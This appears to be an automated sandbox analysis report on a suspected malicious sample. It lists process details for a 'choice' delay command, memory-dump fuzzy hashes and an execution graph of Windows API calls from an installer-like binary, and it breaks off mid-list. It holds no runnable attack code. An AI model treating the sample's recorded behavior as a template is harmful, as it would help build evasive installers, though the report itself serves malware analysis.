                                                                                                                                                                    Start time:03:29:35
                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:choice /d y /t 5
                                                                                                                                                                    Imagebase:0x180000
                                                                                                                                                                    File size:28'160 bytes
                                                                                                                                                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Reset < >
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2262471875.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_57a0000_CLaYpUL3zw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 8gq
                                                                                                                                                                      • API String ID: 0-1984363304
                                                                                                                                                                      • Opcode ID: 0d1f6e8688eac31fa6ece02b6052f3839e83887cd03b23cb20b8c023db6b5d20
                                                                                                                                                                      • Instruction ID: 9d118c0c4f7cbc69faa7c36b8d41586d51fe43471b7a9b06f140f89d514dce47
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d1f6e8688eac31fa6ece02b6052f3839e83887cd03b23cb20b8c023db6b5d20
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D61BF367002089FCB18EB78D49DB29BBA2BBC8304F558A69E40697395DF30EC45DB91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2262471875.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_57a0000_CLaYpUL3zw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 69bbbded5534bd9ef995404f5a97b34bb8407d7b6723da868d32d2a4867b86ad
                                                                                                                                                                      • Instruction ID: dee1dc7ba7729c330b2ec9fb232353a078b036d169e61fd981f902c9269a0969
                                                                                                                                                                      • Opcode Fuzzy Hash: 69bbbded5534bd9ef995404f5a97b34bb8407d7b6723da868d32d2a4867b86ad
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E518C70A0020ECFCB05DFB8E691A9EBBB2FF89304F604568D5146B364EB355A45CB91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2262471875.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_57a0000_CLaYpUL3zw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c7bb1c87f7ce51513ff4c869866ae695d604798d3ad0e65600888bc6d6baf8a4
                                                                                                                                                                      • Instruction ID: f458c26b31f85fb9983caab68235874ce188fe8cdb6cc8c3e0b8b47d196696ec
                                                                                                                                                                      • Opcode Fuzzy Hash: c7bb1c87f7ce51513ff4c869866ae695d604798d3ad0e65600888bc6d6baf8a4
                                                                                                                                                                      • Instruction Fuzzy Hash: B4414D70A0020ECFCB05DFB8E595A9EBBB3FF89304F604568D5146B364EB356A45CB91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2262471875.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_57a0000_CLaYpUL3zw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8a2dd176fad0658dc348a42d3e870e2992937d402e2d581d9e4d687f3db5ea16
                                                                                                                                                                      • Instruction ID: b9cab781880ae2c046e47f89ecde84770f9acabde88043719b963b089ee3a260
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a2dd176fad0658dc348a42d3e870e2992937d402e2d581d9e4d687f3db5ea16
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F2134777001158BCB01DBADD488ABEBBE6FBC4214F148A29E90D97341DB30E946CBD1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2262471875.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_57a0000_CLaYpUL3zw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0d6eb13a663a86e59ff5ed3f6e4b1823e55064fc812ff2b7fb4a885abe9ec291
                                                                                                                                                                      • Instruction ID: c2658d7ac6b3686283a1501e93ae9c55a3a3ace52f986cb92a16b68e28aa784b
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d6eb13a663a86e59ff5ed3f6e4b1823e55064fc812ff2b7fb4a885abe9ec291
                                                                                                                                                                      • Instruction Fuzzy Hash: 3701AD72A0026A9FCB00CBADC5949AEFBF0FB49310F118665E459E7242D330EA40CBE1

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:17.6%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:21%
                                                                                                                                                                      Total number of Nodes:1482
                                                                                                                                                                      Total number of Limit Nodes:26
                                                                                                                                                                      execution_graph 4186 402fc0 4187 401446 18 API calls 4186->4187 4188 402fc7 4187->4188 4189 401a13 4188->4189 4190 403017 4188->4190 4191 40300a 4188->4191 4193 406831 18 API calls 4190->4193 4192 401446 18 API calls 4191->4192 4192->4189 4193->4189 4194 4023c1 4195 40145c 18 API calls 4194->4195 4196 4023c8 4195->4196 4199 407296 4196->4199 4202 406efe CreateFileW 4199->4202 4203 406f30 4202->4203 4204 406f4a ReadFile 4202->4204 4205 4062cf 11 API calls 4203->4205 4206 4023d6 4204->4206 4209 406fb0 4204->4209 4205->4206 4207 406fc7 ReadFile lstrcpynA lstrcmpA 4207->4209 4210 40700e SetFilePointer ReadFile 4207->4210 4208 40720f CloseHandle 4208->4206 4209->4206 4209->4207 4209->4208 4211 407009 4209->4211 4210->4208 4212 4070d4 ReadFile 4210->4212 4211->4208 4213 407164 4212->4213 4213->4211 4213->4212 4214 40718b SetFilePointer GlobalAlloc ReadFile 4213->4214 4215 4071eb lstrcpynW GlobalFree 4214->4215 4216 4071cf 4214->4216 4215->4208 4216->4215 4216->4216 4217 401cc3 4218 40145c 18 API calls 4217->4218 4219 401cca lstrlenW 4218->4219 4220 4030dc 4219->4220 4221 4030e3 4220->4221 4223 405f7d wsprintfW 4220->4223 4223->4221 4224 401c46 4225 40145c 18 API calls 4224->4225 4226 401c4c 4225->4226 4227 4062cf 11 API calls 4226->4227 4228 401c59 4227->4228 4229 406cc7 81 API calls 4228->4229 4230 401c64 4229->4230 4231 403049 4232 401446 18 API calls 4231->4232 4233 403050 4232->4233 4234 406831 18 API calls 4233->4234 4235 401a13 4233->4235 4234->4235 4236 40204a 4237 401446 18 API calls 4236->4237 4238 402051 IsWindow 4237->4238 4239 4018d3 4238->4239 4240 40324c 4241 403277 4240->4241 4242 40325e SetTimer 4240->4242 4243 4032cc 4241->4243 4244 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4241->4244 4242->4241 4244->4243 4245 4022cc 4246 40145c 18 API calls 4245->4246 4247 4022d3 4246->4247 4248 406301 2 API calls 4247->4248 4249 4022d9 4248->4249 4251 4022e8 4249->4251 4254 405f7d wsprintfW 4249->4254 4252 4030e3 4251->4252 4255 405f7d wsprintfW 4251->4255 4254->4251 4255->4252 4256 4030cf 4257 40145c 18 API calls 4256->4257 4258 4030d6 4257->4258 4260 4030dc 4258->4260 4263 4063d8 GlobalAlloc lstrlenW 4258->4263 4261 4030e3 4260->4261 4290 405f7d wsprintfW 4260->4290 4264 406460 4263->4264 4265 40640e 4263->4265 4264->4260 4266 40643b GetVersionExW 4265->4266 4291 406057 CharUpperW 4265->4291 4266->4264 4267 40646a 4266->4267 4268 406490 LoadLibraryA 4267->4268 4269 406479 4267->4269 4268->4264 4272 4064ae GetProcAddress GetProcAddress GetProcAddress 4268->4272 4269->4264 4271 4065b1 GlobalFree 4269->4271 4273 4065c7 LoadLibraryA 4271->4273 4274 406709 FreeLibrary 4271->4274 4275 406621 4272->4275 4279 4064d6 4272->4279 4273->4264 4277 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4273->4277 4274->4264 4276 40667d FreeLibrary 4275->4276 4278 406656 4275->4278 4276->4278 4277->4275 4282 406716 4278->4282 4287 4066b1 lstrcmpW 4278->4287 4288 4066e2 CloseHandle 4278->4288 4289 406700 CloseHandle 4278->4289 4279->4275 4280 406516 4279->4280 4281 4064fa FreeLibrary GlobalFree 4279->4281 4280->4271 4283 406528 lstrcpyW OpenProcess 4280->4283 4285 40657b CloseHandle CharUpperW lstrcmpW 4280->4285 4281->4264 4284 40671b CloseHandle FreeLibrary 4282->4284 4283->4280 4283->4285 4286 406730 CloseHandle 4284->4286 4285->4275 4285->4280 4286->4284 4287->4278 4287->4286 4288->4278 4289->4274 4290->4261 4291->4265 4292 4044d1 4293 40450b 4292->4293 4294 40453e 4292->4294 4360 405cb0 GetDlgItemTextW 4293->4360 4295 40454b GetDlgItem GetAsyncKeyState 4294->4295 4299 4045dd 4294->4299 4297 40456a GetDlgItem 4295->4297 4310 404588 4295->4310 4302 403d6b 19 API calls 4297->4302 4298 4046c9 4358 40485f 4298->4358 4362 405cb0 GetDlgItemTextW 4298->4362 4299->4298 4307 406831 18 API calls 4299->4307 4299->4358 4300 404516 4301 406064 5 API calls 4300->4301 4303 40451c 4301->4303 4305 40457d ShowWindow 4302->4305 4306 403ea0 5 API calls 4303->4306 4305->4310 4311 404521 GetDlgItem 4306->4311 4312 40465b SHBrowseForFolderW 4307->4312 4308 4046f5 4313 4067aa 18 API calls 4308->4313 4309 403df6 8 API calls 4314 404873 4309->4314 4315 4045a5 SetWindowTextW 4310->4315 4319 405d85 4 API calls 4310->4319 4316 40452f IsDlgButtonChecked 4311->4316 4311->4358 4312->4298 4318 404673 CoTaskMemFree 4312->4318 4323 4046fb 4313->4323 4317 403d6b 19 API calls 4315->4317 4316->4294 4321 4045c3 4317->4321 4322 40674e 3 API calls 4318->4322 4320 40459b 4319->4320 4320->4315 4327 40674e 3 API calls 4320->4327 4324 403d6b 19 API calls 4321->4324 4325 404680 4322->4325 4363 406035 lstrcpynW 4323->4363 4328 4045ce 4324->4328 4329 4046b7 SetDlgItemTextW 4325->4329 4334 406831 18 API calls 4325->4334 4327->4315 4361 403dc4 SendMessageW 4328->4361 4329->4298 4330 404712 4332 406328 3 API calls 4330->4332 4341 40471a 4332->4341 4333 4045d6 4335 406328 3 API calls 4333->4335 4336 40469f lstrcmpiW 4334->4336 4335->4299 4336->4329 4339 4046b0 lstrcatW 4336->4339 4337 40475c 4364 406035 lstrcpynW 4337->4364 4339->4329 4340 404765 4342 405d85 4 API calls 4340->4342 4341->4337 4345 40677d 2 API calls 4341->4345 4347 4047b1 4341->4347 4343 40476b GetDiskFreeSpaceW 4342->4343 4346 40478f MulDiv 4343->4346 4343->4347 4345->4341 4346->4347 4348 40480e 4347->4348 4365 4043d9 4347->4365 4349 404831 4348->4349 4351 40141d 80 API calls 4348->4351 4373 403db1 KiUserCallbackDispatcher 4349->4373 4351->4349 4352 4047ff 4354 404810 SetDlgItemTextW 4352->4354 4355 404804 4352->4355 4354->4348 4357 4043d9 21 API calls 4355->4357 4356 40484d 4356->4358 4374 403d8d 4356->4374 4357->4348 4358->4309 4360->4300 4361->4333 4362->4308 4363->4330 4364->4340 4366 4043f9 4365->4366 4367 406831 18 API calls 4366->4367 4368 404439 4367->4368 4369 406831 18 API calls 4368->4369 4370 404444 4369->4370 4371 406831 18 API calls 4370->4371 4372 404454 lstrlenW wsprintfW SetDlgItemTextW 4371->4372 4372->4352 4373->4356 4375 403da0 SendMessageW 4374->4375 4376 403d9b 4374->4376 4375->4358 4376->4375 4377 401dd3 4378 401446 18 API calls 4377->4378 4379 401dda 4378->4379 4380 401446 18 API calls 4379->4380 4381 4018d3 4380->4381 4382 402e55 4383 40145c 18 API calls 4382->4383 4384 402e63 4383->4384 4385 402e79 4384->4385 4386 40145c 18 API calls 4384->4386 4387 405e5c 2 API calls 4385->4387 4386->4385 4388 402e7f 4387->4388 4412 405e7c GetFileAttributesW CreateFileW 4388->4412 4390 402e8c 4391 402f35 4390->4391 4392 402e98 GlobalAlloc 4390->4392 4395 4062cf 11 API calls 4391->4395 4393 402eb1 4392->4393 4394 402f2c CloseHandle 4392->4394 4413 403368 SetFilePointer 4393->4413 4394->4391 4397 402f45 4395->4397 4399 402f50 DeleteFileW 4397->4399 4400 402f63 4397->4400 4398 402eb7 4401 403336 ReadFile 4398->4401 4399->4400 4414 401435 4400->4414 4403 402ec0 GlobalAlloc 4401->4403 4404 402ed0 4403->4404 4405 402f04 WriteFile GlobalFree 4403->4405 4407 40337f 33 API calls 4404->4407 4406 40337f 33 API calls 4405->4406 4408 402f29 4406->4408 4411 402edd 4407->4411 4408->4394 4410 402efb GlobalFree 4410->4405 4411->4410 4412->4390 4413->4398 4415 404f9e 25 API calls 4414->4415 4416 401443 4415->4416 4417 401cd5 4418 401446 18 API calls 4417->4418 4419 401cdd 4418->4419 4420 401446 18 API calls 4419->4420 4421 401ce8 4420->4421 4422 40145c 18 API calls 4421->4422 4423 401cf1 4422->4423 4424 401d07 lstrlenW 4423->4424 4425 401d43 4423->4425 4426 401d11 4424->4426 4426->4425 4430 406035 lstrcpynW 4426->4430 4428 401d2c 4428->4425 4429 401d39 lstrlenW 4428->4429 4429->4425 4430->4428 4431 402cd7 4432 401446 18 API calls 4431->4432 4434 402c64 4432->4434 4433 402d17 ReadFile 4433->4434 4434->4431 4434->4433 4435 402d99 4434->4435 4436 402dd8 4437 4030e3 4436->4437 4438 402ddf 4436->4438 4439 402de5 FindClose 4438->4439 4439->4437 4440 401d5c 4441 40145c 18 API calls 4440->4441 4442 401d63 4441->4442 4443 40145c 18 API calls 4442->4443 4444 401d6c 4443->4444 4445 401d73 lstrcmpiW 4444->4445 4446 401d86 lstrcmpW 4444->4446 4447 401d79 4445->4447 4446->4447 4448 401c99 4446->4448 4447->4446 4447->4448 4449 4027e3 4450 4027e9 4449->4450 4451 4027f2 4450->4451 4452 402836 4450->4452 4465 401553 4451->4465 4453 40145c 18 API calls 4452->4453 4455 40283d 4453->4455 4457 4062cf 11 API calls 4455->4457 4456 4027f9 4458 40145c 18 API calls 4456->4458 4462 401a13 4456->4462 4459 40284d 4457->4459 4460 40280a RegDeleteValueW 4458->4460 4469 40149d RegOpenKeyExW 4459->4469 4461 4062cf 11 API calls 4460->4461 4464 40282a RegCloseKey 4461->4464 4464->4462 4466 401563 4465->4466 4467 40145c 18 API calls 4466->4467 4468 401589 RegOpenKeyExW 4467->4468 4468->4456 4472 4014c9 4469->4472 4477 401515 4469->4477 4470 4014ef RegEnumKeyW 4471 401501 RegCloseKey 4470->4471 4470->4472 4474 406328 3 API calls 4471->4474 4472->4470 4472->4471 4473 401526 RegCloseKey 4472->4473 4475 40149d 3 API calls 4472->4475 4473->4477 4476 401511 4474->4476 4475->4472 4476->4477 4478 401541 RegDeleteKeyW 4476->4478 4477->4462 4478->4477 4479 4040e4 4480 4040ff 4479->4480 4486 40422d 4479->4486 4482 40413a 4480->4482 4510 403ff6 WideCharToMultiByte 4480->4510 4481 404298 4483 40436a 4481->4483 4484 4042a2 GetDlgItem 4481->4484 4490 403d6b 19 API calls 4482->4490 4491 403df6 8 API calls 4483->4491 4487 40432b 4484->4487 4488 4042bc 4484->4488 4486->4481 4486->4483 4489 404267 GetDlgItem SendMessageW 4486->4489 4487->4483 4492 40433d 4487->4492 4488->4487 4496 4042e2 6 API calls 4488->4496 4515 403db1 KiUserCallbackDispatcher 4489->4515 4494 40417a 4490->4494 4495 404365 4491->4495 4497 404353 4492->4497 4498 404343 SendMessageW 4492->4498 4500 403d6b 19 API calls 4494->4500 4496->4487 4497->4495 4501 404359 SendMessageW 4497->4501 4498->4497 4499 404293 4502 403d8d SendMessageW 4499->4502 4503 404187 CheckDlgButton 4500->4503 4501->4495 4502->4481 4513 403db1 KiUserCallbackDispatcher 4503->4513 4505 4041a5 GetDlgItem 4514 403dc4 SendMessageW 4505->4514 4507 4041bb SendMessageW 4508 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4507->4508 4509 4041d8 GetSysColor 4507->4509 4508->4495 4509->4508 4511 404033 4510->4511 4512 404015 GlobalAlloc WideCharToMultiByte 4510->4512 4511->4482 4512->4511 4513->4505 4514->4507 4515->4499 4516 402ae4 4517 402aeb 4516->4517 4518 4030e3 4516->4518 4519 402af2 CloseHandle 4517->4519 4519->4518 4520 402065 4521 401446 18 API calls 4520->4521 4522 40206d 4521->4522 4523 401446 18 API calls 4522->4523 4524 402076 GetDlgItem 4523->4524 4525 4030dc 4524->4525 4526 4030e3 4525->4526 4528 405f7d wsprintfW 4525->4528 4528->4526 4529 402665 4530 40145c 18 API calls 4529->4530 4531 40266b 4530->4531 4532 40145c 18 API calls 4531->4532 4533 402674 4532->4533 4534 40145c 18 API calls 4533->4534 4535 40267d 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 40268c 4536->4537 4538 406301 2 API calls 4537->4538 4539 402695 4538->4539 4540 4026a6 lstrlenW lstrlenW 4539->4540 4542 404f9e 25 API calls 4539->4542 4544 4030e3 4539->4544 4541 404f9e 25 API calls 4540->4541 4543 4026e8 SHFileOperationW 4541->4543 4542->4539 4543->4539 4543->4544 4545 401c69 4546 40145c 18 API calls 4545->4546 4547 401c70 4546->4547 4548 4062cf 11 API calls 4547->4548 4549 401c80 4548->4549 4550 405ccc MessageBoxIndirectW 4549->4550 4551 401a13 4550->4551 4552 402f6e 4553 402f72 4552->4553 4554 402fae 4552->4554 4556 4062cf 11 API calls 4553->4556 4555 40145c 18 API calls 4554->4555 4562 402f9d 4555->4562 4557 402f7d 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 402f90 4558->4559 4560 402fa2 4559->4560 4561 402f98 4559->4561 4564 406113 9 API calls 4560->4564 4563 403ea0 5 API calls 4561->4563 4563->4562 4564->4562 4565 4023f0 4566 402403 4565->4566 4567 4024da 4565->4567 4568 40145c 18 API calls 4566->4568 4569 404f9e 25 API calls 4567->4569 4570 40240a 4568->4570 4573 4024f1 4569->4573 4571 40145c 18 API calls 4570->4571 4572 402413 4571->4572 4574 402429 LoadLibraryExW 4572->4574 4575 40241b GetModuleHandleW 4572->4575 4576 4024ce 4574->4576 4577 40243e 4574->4577 4575->4574 4575->4577 4579 404f9e 25 API calls 4576->4579 4589 406391 GlobalAlloc WideCharToMultiByte 4577->4589 4579->4567 4580 402449 4581 40248c 4580->4581 4582 40244f 4580->4582 4583 404f9e 25 API calls 4581->4583 4584 401435 25 API calls 4582->4584 4587 40245f 4582->4587 4585 402496 4583->4585 4584->4587 4586 4062cf 11 API calls 4585->4586 4586->4587 4587->4573 4588 4024c0 FreeLibrary 4587->4588 4588->4573 4590 4063c9 GlobalFree 4589->4590 4591 4063bc GetProcAddress 4589->4591 4590->4580 4591->4590 3431 402175 3432 401446 18 API calls 3431->3432 3433 40217c 3432->3433 3434 401446 18 API calls 3433->3434 3435 402186 3434->3435 3436 402197 3435->3436 3439 4062cf 11 API calls 3435->3439 3437 4021aa EnableWindow 3436->3437 3438 40219f ShowWindow 3436->3438 3440 4030e3 3437->3440 3438->3440 3439->3436 4592 4048f8 4593 404906 4592->4593 4594 40491d 4592->4594 4595 40490c 4593->4595 4610 404986 4593->4610 4596 40492b IsWindowVisible 4594->4596 4602 404942 4594->4602 4597 403ddb SendMessageW 4595->4597 4599 404938 4596->4599 4596->4610 4600 404916 4597->4600 4598 40498c CallWindowProcW 4598->4600 4611 40487a SendMessageW 4599->4611 4602->4598 4616 406035 lstrcpynW 4602->4616 4604 404971 4617 405f7d wsprintfW 4604->4617 4606 404978 4607 40141d 80 API calls 4606->4607 4608 40497f 4607->4608 4618 406035 lstrcpynW 4608->4618 4610->4598 4612 4048d7 SendMessageW 4611->4612 4613 40489d GetMessagePos ScreenToClient SendMessageW 4611->4613 4615 4048cf 4612->4615 4614 4048d4 4613->4614 4613->4615 4614->4612 4615->4602 4616->4604 4617->4606 4618->4610 3733 4050f9 3734 4052c1 3733->3734 3735 40511a GetDlgItem GetDlgItem GetDlgItem 3733->3735 3736 4052f2 3734->3736 3737 4052ca GetDlgItem CreateThread CloseHandle 3734->3737 3782 403dc4 SendMessageW 3735->3782 3739 405320 3736->3739 3741 405342 3736->3741 3742 40530c ShowWindow ShowWindow 3736->3742 3737->3736 3785 405073 OleInitialize 3737->3785 3743 40537e 3739->3743 3745 405331 3739->3745 3746 405357 ShowWindow 3739->3746 3740 40518e 3752 406831 18 API calls 3740->3752 3747 403df6 8 API calls 3741->3747 3784 403dc4 SendMessageW 3742->3784 3743->3741 3748 405389 SendMessageW 3743->3748 3749 403d44 SendMessageW 3745->3749 3750 405377 3746->3750 3751 405369 3746->3751 3757 4052ba 3747->3757 3756 4053a2 CreatePopupMenu 3748->3756 3748->3757 3749->3741 3755 403d44 SendMessageW 3750->3755 3753 404f9e 25 API calls 3751->3753 3754 4051ad 3752->3754 3753->3750 3758 4062cf 11 API calls 3754->3758 3755->3743 3759 406831 18 API calls 3756->3759 3760 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3758->3760 3761 4053b2 AppendMenuW 3759->3761 3762 405203 SendMessageW SendMessageW 3760->3762 3763 40521f 3760->3763 3764 4053c5 GetWindowRect 3761->3764 3765 4053d8 3761->3765 3762->3763 3766 405232 3763->3766 3767 405224 SendMessageW 3763->3767 3768 4053df TrackPopupMenu 3764->3768 3765->3768 3769 403d6b 19 API calls 3766->3769 3767->3766 3768->3757 3770 4053fd 3768->3770 3771 405242 3769->3771 3772 405419 SendMessageW 3770->3772 3773 40524b ShowWindow 3771->3773 3774 40527f GetDlgItem SendMessageW 3771->3774 3772->3772 3775 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3772->3775 3776 405261 ShowWindow 3773->3776 3777 40526e 3773->3777 3774->3757 3778 4052a2 SendMessageW SendMessageW 3774->3778 3779 40545b SendMessageW 3775->3779 3776->3777 3783 403dc4 SendMessageW 3777->3783 3778->3757 3779->3779 3780 405486 GlobalUnlock SetClipboardData CloseClipboard 3779->3780 3780->3757 3782->3740 3783->3774 3784->3739 3786 403ddb SendMessageW 3785->3786 3790 405096 3786->3790 3787 403ddb SendMessageW 3788 4050d1 OleUninitialize 3787->3788 3789 4062cf 11 API calls 3789->3790 3790->3789 3791 40139d 80 API calls 3790->3791 3792 4050c1 3790->3792 3791->3790 3792->3787 4619 4020f9 GetDC GetDeviceCaps 4620 401446 18 API calls 4619->4620 4621 402116 MulDiv 4620->4621 4622 401446 18 API calls 4621->4622 4623 40212c 4622->4623 4624 406831 18 API calls 4623->4624 4625 402165 CreateFontIndirectW 4624->4625 4626 4030dc 4625->4626 4627 4030e3 4626->4627 4629 405f7d wsprintfW 4626->4629 4629->4627 4630 4024fb 4631 40145c 18 API calls 4630->4631 4632 402502 4631->4632 4633 40145c 18 API calls 4632->4633 4634 40250c 4633->4634 4635 40145c 18 API calls 4634->4635 4636 402515 4635->4636 4637 40145c 18 API calls 4636->4637 4638 40251f 4637->4638 4639 40145c 18 API calls 4638->4639 4640 402529 4639->4640 4641 40253d 4640->4641 4642 40145c 18 API calls 4640->4642 4643 4062cf 11 API calls 4641->4643 4642->4641 4644 40256a CoCreateInstance 4643->4644 4645 40258c 4644->4645 4646 4026fc 4648 402708 4646->4648 4649 401ee4 4646->4649 4647 406831 18 API calls 4647->4649 4649->4646 4649->4647 3793 4019fd 3794 40145c 18 API calls 3793->3794 3795 401a04 3794->3795 3798 405eab 3795->3798 3799 405eb8 GetTickCount GetTempFileNameW 3798->3799 3800 401a0b 3799->3800 3801 405eee 3799->3801 3801->3799 3801->3800 4650 4022fd 4651 40145c 18 API calls 4650->4651 4652 402304 GetFileVersionInfoSizeW 4651->4652 4653 4030e3 4652->4653 4654 40232b GlobalAlloc 4652->4654 4654->4653 4655 40233f GetFileVersionInfoW 4654->4655 4656 402350 VerQueryValueW 4655->4656 4657 402381 GlobalFree 4655->4657 4656->4657 4658 402369 4656->4658 4657->4653 4663 405f7d wsprintfW 4658->4663 4661 402375 4664 405f7d wsprintfW 4661->4664 4663->4661 4664->4657 4665 402afd 4666 40145c 18 API calls 4665->4666 4667 402b04 4666->4667 4672 405e7c GetFileAttributesW CreateFileW 4667->4672 4669 402b10 4670 4030e3 4669->4670 4673 405f7d wsprintfW 4669->4673 4672->4669 4673->4670 4674 4029ff 4675 401553 19 API calls 4674->4675 4676 402a09 4675->4676 4677 40145c 18 API calls 4676->4677 4678 402a12 4677->4678 4679 402a1f RegQueryValueExW 4678->4679 4683 401a13 4678->4683 4680 402a45 4679->4680 4681 402a3f 4679->4681 4682 4029e4 RegCloseKey 4680->4682 4680->4683 4681->4680 4685 405f7d wsprintfW 4681->4685 4682->4683 4685->4680 4686 401000 4687 401037 BeginPaint GetClientRect 4686->4687 4688 40100c DefWindowProcW 4686->4688 4690 4010fc 4687->4690 4691 401182 4688->4691 4692 401073 CreateBrushIndirect FillRect DeleteObject 4690->4692 4693 401105 4690->4693 4692->4690 4694 401170 EndPaint 4693->4694 4695 40110b CreateFontIndirectW 4693->4695 4694->4691 4695->4694 4696 40111b 6 API calls 4695->4696 4696->4694 4697 401f80 4698 401446 18 API calls 4697->4698 4699 401f88 4698->4699 4700 401446 18 API calls 4699->4700 4701 401f93 4700->4701 4702 401fa3 4701->4702 4703 40145c 18 API calls 4701->4703 4704 401fb3 4702->4704 4705 40145c 18 API calls 4702->4705 4703->4702 4706 402006 4704->4706 4707 401fbc 4704->4707 4705->4704 4708 40145c 18 API calls 4706->4708 4709 401446 18 API calls 4707->4709 4710 40200d 4708->4710 4711 401fc4 4709->4711 4713 40145c 18 API calls 4710->4713 4712 401446 18 API calls 4711->4712 4714 401fce 4712->4714 4715 402016 FindWindowExW 4713->4715 4716 401ff6 SendMessageW 4714->4716 4717 401fd8 SendMessageTimeoutW 4714->4717 4719 402036 4715->4719 4716->4719 4717->4719 4718 4030e3 4719->4718 4721 405f7d wsprintfW 4719->4721 4721->4718 4722 402880 4723 402884 4722->4723 4724 40145c 18 API calls 4723->4724 4725 4028a7 4724->4725 4726 40145c 18 API calls 4725->4726 4727 4028b1 4726->4727 4728 4028ba RegCreateKeyExW 4727->4728 4729 4028e8 4728->4729 4734 4029ef 4728->4734 4730 402934 4729->4730 4732 40145c 18 API calls 4729->4732 4731 402963 4730->4731 4733 401446 18 API calls 4730->4733 4735 4029ae RegSetValueExW 4731->4735 4738 40337f 33 API calls 4731->4738 4736 4028fc lstrlenW 4732->4736 4737 402947 4733->4737 4741 4029c6 RegCloseKey 4735->4741 4742 4029cb 4735->4742 4739 402918 4736->4739 4740 40292a 4736->4740 4744 4062cf 11 API calls 4737->4744 4745 40297b 4738->4745 4746 4062cf 11 API calls 4739->4746 4747 4062cf 11 API calls 4740->4747 4741->4734 4743 4062cf 11 API calls 4742->4743 4743->4741 4744->4731 4753 406250 4745->4753 4750 402922 4746->4750 4747->4730 4750->4735 4752 4062cf 11 API calls 4752->4750 4754 406273 4753->4754 4755 4062b6 4754->4755 4756 406288 wsprintfW 4754->4756 4757 402991 4755->4757 4758 4062bf lstrcatW 4755->4758 4756->4755 4756->4756 4757->4752 4758->4757 4759 403d02 4760 403d0d 4759->4760 4761 403d11 4760->4761 4762 403d14 GlobalAlloc 4760->4762 4762->4761 4763 402082 4764 401446 18 API calls 4763->4764 4765 402093 SetWindowLongW 4764->4765 4766 4030e3 4765->4766 4767 402a84 4768 401553 19 API calls 4767->4768 4769 402a8e 4768->4769 4770 401446 18 API calls 4769->4770 4771 402a98 4770->4771 4772 401a13 4771->4772 4773 402ab2 RegEnumKeyW 4771->4773 4774 402abe RegEnumValueW 4771->4774 4775 402a7e 4773->4775 4774->4772 4774->4775 4775->4772 4776 4029e4 RegCloseKey 4775->4776 4776->4772 4777 402c8a 4778 402ca2 4777->4778 4779 402c8f 4777->4779 4781 40145c 18 API calls 4778->4781 4780 401446 18 API calls 4779->4780 4783 402c97 4780->4783 4782 402ca9 lstrlenW 4781->4782 4782->4783 4784 401a13 4783->4784 4785 402ccb WriteFile 4783->4785 4785->4784 4786 401d8e 4787 40145c 18 API calls 4786->4787 4788 401d95 ExpandEnvironmentStringsW 4787->4788 4789 401da8 4788->4789 4790 401db9 4788->4790 4789->4790 4791 401dad lstrcmpW 4789->4791 4791->4790 4792 401e0f 4793 401446 18 API calls 4792->4793 4794 401e17 4793->4794 4795 401446 18 API calls 4794->4795 4796 401e21 4795->4796 4797 4030e3 4796->4797 4799 405f7d wsprintfW 4796->4799 4799->4797 4800 40438f 4801 